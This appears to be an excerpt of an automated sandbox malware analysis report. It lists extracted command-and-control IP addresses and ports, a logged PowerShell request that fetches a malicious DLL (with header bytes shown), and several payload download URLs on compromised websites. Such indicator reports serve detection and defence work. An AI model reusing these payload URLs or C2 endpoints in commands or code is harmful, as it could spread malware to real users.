                  Source: Malware configuration extractorIPs: 212.24.98.99:8080
                  Source: Malware configuration extractorIPs: 119.193.124.41:7080
                  Source: Malware configuration extractorIPs: 45.118.115.99:8080
                  Source: Malware configuration extractorIPs: 188.44.20.25:443
                  Source: Malware configuration extractorIPs: 103.132.242.26:8080
                  Source: Malware configuration extractorIPs: 201.94.166.162:443
                  Source: Malware configuration extractorIPs: 1.234.21.73:7080
                  Source: Malware configuration extractorIPs: 206.189.28.199:8080
                  Source: Malware configuration extractorIPs: 185.8.212.130:7080
                  Source: Malware configuration extractorIPs: 82.165.152.127:8080
                  Source: Malware configuration extractorIPs: 176.104.106.96:8080
                  Source: Malware configuration extractorIPs: 173.212.193.249:8080
                  Source: Malware configuration extractorIPs: 167.99.115.35:8080
                  Source: Malware configuration extractorIPs: 209.126.98.206:8080
                  Source: Malware configuration extractorIPs: 185.157.82.211:8080
                  Source: Malware configuration extractorIPs: 212.237.17.99:8080
                  Source: Malware configuration extractorIPs: 185.4.135.165:8080
                  Source: Malware configuration extractorIPs: 51.91.7.5:8080
                  Source: Malware configuration extractorIPs: 187.84.80.182:443
                  Source: Malware configuration extractorIPs: 164.68.99.3:8080
                  Source: Malware configuration extractorIPs: 107.182.225.142:8080
                  Source: Malware configuration extractorIPs: 58.227.42.236:80
                  Source: Malware configuration extractorIPs: 103.75.201.2:443
                  Source: Malware configuration extractorIPs: 101.50.0.91:8080
                  Source: Malware configuration extractorIPs: 216.158.226.206:443
                  Source: Malware configuration extractorIPs: 151.106.112.196:8080
                  Source: Malware configuration extractorIPs: 45.235.8.30:8080
                  Source: Malware configuration extractorIPs: 146.59.226.45:443
                  Source: Malware configuration extractorIPs: 45.176.232.124:443
                  Source: Malware configuration extractorIPs: 134.122.66.193:8080
                  Source: Malware configuration extractorIPs: 51.254.140.238:7080
                  Source: Malware configuration extractorIPs: 131.100.24.231:80
                  Source: Malware configuration extractorIPs: 167.172.253.162:8080
                  Source: Malware configuration extractorIPs: 50.30.40.196:8080
                  Source: Malware configuration extractorIPs: 203.114.109.124:443
                  Source: Malware configuration extractorIPs: 94.23.45.86:4143
                  Source: Malware configuration extractorIPs: 189.126.111.200:7080
                  Source: Malware configuration extractorIPs: 160.16.142.56:8080
                  Source: Malware configuration extractorIPs: 27.54.89.58:8080
                  Source: Malware configuration extractorIPs: 5.9.116.246:8080
                  Source: Malware configuration extractorIPs: 46.55.222.11:443
                  Source: Malware configuration extractorIPs: 209.97.163.214:443
                  Source: Malware configuration extractorIPs: 110.232.117.186:8080
                  Source: Malware configuration extractorIPs: 1.234.2.232:8080
                  Source: Malware configuration extractorIPs: 153.126.146.25:7080
                  Source: Malware configuration extractorIPs: 183.111.227.137:8080
                  Source: Malware configuration extractorIPs: 196.218.30.83:443
                  Source: Malware configuration extractorIPs: 103.70.28.102:8080
                  Source: Malware configuration extractorIPs: 51.91.76.89:8080
                  Source: Malware configuration extractorIPs: 91.207.28.33:8080
                  Source: Malware configuration extractorIPs: 72.15.201.15:8080
                  Source: Malware configuration extractorIPs: 103.43.46.182:443
                  Source: Malware configuration extractorIPs: 209.250.246.206:443
                  Source: Malware configuration extractorIPs: 197.242.150.244:8080
                  Source: Malware configuration extractorIPs: 159.65.88.10:8080
                  Source: Malware configuration extractorIPs: 172.104.251.154:8080
                  Source: Malware configuration extractorIPs: 158.69.222.101:443
                  Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                  Source: Joe Sandbox ViewASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
                  Source: Joe Sandbox ViewIP Address: 151.106.112.196 151.106.112.196
                  Source: Joe Sandbox ViewIP Address: 110.232.117.186 110.232.117.186
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 26 Apr 2022 07:46:23 GMTServer: ApacheX-Powered-By: PHP/7.3.33Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Tue, 26 Apr 2022 07:46:23 GMTContent-Disposition: attachment; filename="EeL9HdVdV8PNPDkaAx3wjw.dll"Content-Transfer-Encoding: binarySet-Cookie: 6267a34f2b816=1650959183; expires=Tue, 26-Apr-2022 07:47:23 GMT; Max-Age=60; path=/Upgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Tue, 26 Apr 2022 07:46:23 GMTContent-Length: 473088Keep-Alive: timeout=5Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 83 4d e9 75 c7 2c 87 26 c7 2c 87 26 c7 2c 87 26 e0 ea ea 26 c0 2c 87 26 e0 ea fc 26 d2 2c 87 26 c7 2c 86 26 c0 2e 87 26 d9 7e 04 26 44 2c 87 26 d9 7e 12 26 cd 2c 87 26 d9 7e 03 26 4b 2c 87 26 d9 7e 15 26 c6 2c 87 26 d9 7e 13 26 c6 2c 87 26 d9 7e 16 26 c6 2c 87 26 52 69 63 68 c7 2c 87 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 32 09 67 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 09 00 00 fa 02 00 00 3a 04 00 00 00 00 00 08 02 02 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 c0 07 00 00 04 00 00 01 e9 07 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 0f 04 00 4f 00 00 00 18 f4 03 00 b4 00 00 00 00 e0 04 00 4c ae 02 00 00 a0 04 00 c0 33 00 00 00 00 00 00 00 00 00 00 00 90 07 00 b4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 b0 08 00 00 78 f3 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7c f8 02 00 00 10 00 00 00 fa 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ff ff 00 00 00 10 03 00 00 00 01 00 00 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 86 00 00 00 10 04 00 00 2c 00 00 00 fe 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c0 33 00 00 00 a0 04 00 00 34 00 00 00 2a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 4c ae 02 00 00 e0 04 00 00 b0 02 00 00 5e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6a 29 00 00 00 90 07 00 00 2a 00 00 00 0e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Mu,
                  Source: global trafficHTTP traffic detected: GET /fmlib/IxBABMh0I2cLM3qq1GVv/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: focusmedica.inConnection: Keep-Alive
                  Source: global trafficTCP traffic: 192.168.2.3:49756 -> 138.201.142.73:8080
                  Source: unknownNetwork traffic detected: IP country count 28
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.201.142.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.201.142.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.201.142.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.201.142.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.201.142.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.201.142.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.201.142.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.201.142.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.201.142.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.201.142.73
                  Source: svchost.exe, 00000014.00000003.402282768.00000278A4574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
                  Source: svchost.exe, 00000014.00000003.402282768.00000278A4574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
                  Source: svchost.exe, 00000014.00000003.402282768.00000278A4574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.402537756.00000278A4585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-04-21T14:07:02.1326283Z||.||f28b89c1-eba5-4d1c-9897-a92fbb0d304e||1152921505694753097||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                  Source: svchost.exe, 00000014.00000003.402282768.00000278A4574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.402537756.00000278A4585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-04-21T14:07:02.1326283Z||.||f28b89c1-eba5-4d1c-9897-a92fbb0d304e||1152921505694753097||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                  Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.drString found in binary or memory: http://cipro.mx/prensa/siZP69rBFmibDvuTP1L/
                  Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.drString found in binary or memory: http://colegiounamuno.es/cgi-bin/E/
                  Source: powershell.exe, 00000000.00000002.316606158.000002C338E36000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.304534262.000002A12F09E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.518526373.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.519238319.000001ED94287000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.446318004.00000278A4500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: svchost.exe, 00000011.00000002.519238319.000001ED94287000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.446199582.00000278A3CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: regsvr32.exe, 00000008.00000002.518331169.00000000013A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: regsvr32.exe, 00000008.00000002.518616586.0000000001442000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.518573062.000000000142A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.347575209.0000000001441000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: regsvr32.exe, 00000008.00000003.347312100.0000000003661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?33795ada93a40
                  Source: regsvr32.exe, 00000008.00000002.518573062.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabK4$
                  Source: regsvr32.exe, 00000008.00000002.518430130.00000000013EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?33795ada93
                  Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.drString found in binary or memory: http://demo34.ckg.hk/service/hhMZrfC7Mnm9JD/
                  Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.drString found in binary or memory: http://filmmogzivota.rs/SpryAssets/gDR/
                  Source: powershell.exe, 00000002.00000002.301171990.000002A117825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.301217804.000002A11783A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://focusmedica.in
                  Source: powershell.exe, 00000002.00000002.301252528.000002A117843000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://focusmedica.in/
                  Source: powershell.exe, 00000000.00000002.313413338.000002C321929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://focusmedica.in/fmlib/IxB
                  Source: powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.drString found in binary or memory: http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/
                  Source: powershell.exe, 00000002.00000002.301171990.000002A117825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://focusmedica.inx
                  Source: svchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                  Source: powershell.exe, 00000000.00000002.314787403.000002C330D50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000000.00000002.309161023.000002C320CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.296032360.000002A116C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: svchost.exe, 0000000B.00000002.325666258.0000018977C13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                  Source: svchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                  Source: svchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                  Source: regsvr32.exe, 00000008.00000002.518331169.00000000013A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://138.201.142.73/%
                  Source: regsvr32.exe, 00000008.00000002.518331169.00000000013A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://138.201.142.73/q
                  Source: regsvr32.exe, 00000008.00000002.518331169.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.518396758.00000000013D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://138.201.142.73:8080/DzjyrxpicabQcrITClZT
                  Source: regsvr32.exe, 00000008.00000002.518396758.00000000013D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://138.201.142.73:8080/DzjyrxpicabQcrITClZTs
                  Source: svchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                  Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                  Source: svchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                  Source: svchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                  Source: powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000000.00000002.313413338.000002C321929000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://creemo.pl/wp-admin/Z
                  Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.295855359.000002A115076000.00000004.00000020.00020000.00000000.sdmp, PowerShell_transcript.305090.D8r6TMW3.20220426094615.txt.0.dr, ezMgZunnfF.ps1.0.drString found in binary or memory: https://creemo.pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
                  Source: svchost.exe, 0000000B.00000003.322793678.0000018977C5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                  Source: svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
